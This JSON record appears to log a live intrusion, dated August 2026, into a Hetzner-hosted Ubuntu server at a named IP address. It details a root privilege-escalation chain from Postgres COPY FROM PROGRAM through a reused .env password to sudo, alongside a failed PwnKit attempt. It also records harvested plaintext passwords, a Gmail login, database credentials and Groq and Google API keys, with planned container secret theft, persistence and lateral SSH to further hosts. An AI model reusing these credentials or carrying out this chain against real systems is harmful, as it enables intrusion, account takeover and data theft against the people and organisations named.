{
  "phase": "L8-local-privesc-root",
  "date": "2026-08-17",
  "operator_go": "operator choice: 'Дожать PwnKit / разобрать layout' -> PwnKit closed (patched), pivoted to credential-reuse privesc",
  "target_host": "65.109.51.221 (Ubuntu-2004-focal-64-minimal-hwe, Hetzner)",
  "result": "ROOT uid=0 ACHIEVED",
  "privesc_chain": [
    "PG superuser kafkauser@65.109.51.221:5542 -> COPY FROM PROGRAM -> OS exec as postgres (uid=107)",
    "read world-readable /home/mylar/.env -> DB_PASS Myl@r1999",
    "su mylar (uid=1003, group sudo) with Myl@r1999 -> SUCCESS (DB->OS password reuse)",
    "sudo -S with Myl@r1999 -> uid=0(root)"
  ],
  "pwnkit_disposition": {
    "status": "CLOSED - NOT VULNERABLE",
    "evidence": "policykit-1 = 0.105-26ubuntu1.3 (patched; CVE-2021-4034 fixed in 0.105-26ubuntu1.2). pkexec binary dated Feb 21 2022. gconv-modules.cache May 2025 (host regularly patched).",
    "poc_attempts": "2 runs (arthepsy layout + berdav layout) both -> 'GLib: Cannot convert ... PWNKIT' + pkexec usage + exit 127 = patched behaviour per berdav README"
  },
  "root_proof": {
    "id": "uid=0(root) gid=0(root) groups=0(root),44(video),998(ollama)",
    "hostname": "Ubuntu-2004-focal-64-minimal-hwe",
    "root_shadow_hash_prefix": "$6$/UdtnwmFuTBme43M$",
    "docker_sock": "srw-rw---- root docker (now accessible as root)"
  },
  "additional_loot_found_during_recon": {
    "mylar_.env": "DB_USER=mylar DB_PASS=Myl@r1999 DB_NAME=alpha_magna; MYSQL gcb_script/P6unW82jf$j0 @localhost:3306",
    "pontian_google_meet_agent_.env": "gmail snwolleymeet@gmail.com/0hardythomas0; postgres superuser prod DB_PASSWORD=MRSTEPHANENWOLLEY2018 @127.0.0.1:6432 snwolley_alpha",
    "pontian_snwolley_whatsapp_api_.env": "WAHA dashboard admin/AlphanumericAndSpace#; POSTGRES waha/NPTSupport2025#; license NPONTU-683601B7 ecobank-cvms-prod",
    "jones_executiveuser_.env": "Google API keys (AIza...) x6",
    "agent.py": "Groq API key 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"
  },
  "host_users": {
    "sudo_group": ["jones","pontian","mylar","abraham","kenneth","aodoi","nosa","evans"],
    "docker_group": ["pontian"],
    "note": "pontian = docker+sudo (alternate root path if mylar rotates)"
  },
  "now_possible_as_root": [
    "docker exec into all app containers (Letshego/tottot app tier, License Server, Express APIs)",
    "read all container env/source/JWT secrets from /var/lib/docker + container fs",
    "add root persistence (SSH key / cron / setuid) - GATED",
    "east-west SSH to 148.251.89.119 / 138.201.221.144 with F1 keys (internal routing)"
  ],
  "confidence": "CONFIRMED (live id/hostname/shadow proof captured via RCE read-back)",
  "sysmod": "scratch files /tmp/pkrun + /tmp/.r.out (cleaned), /tmp/.root_proof left on target (contains proof; remove on cleanup)",
  "opsec_note": "su/sudo auth attempts logged in target auth.log (mylar). Single attempts only, no brute force."
}
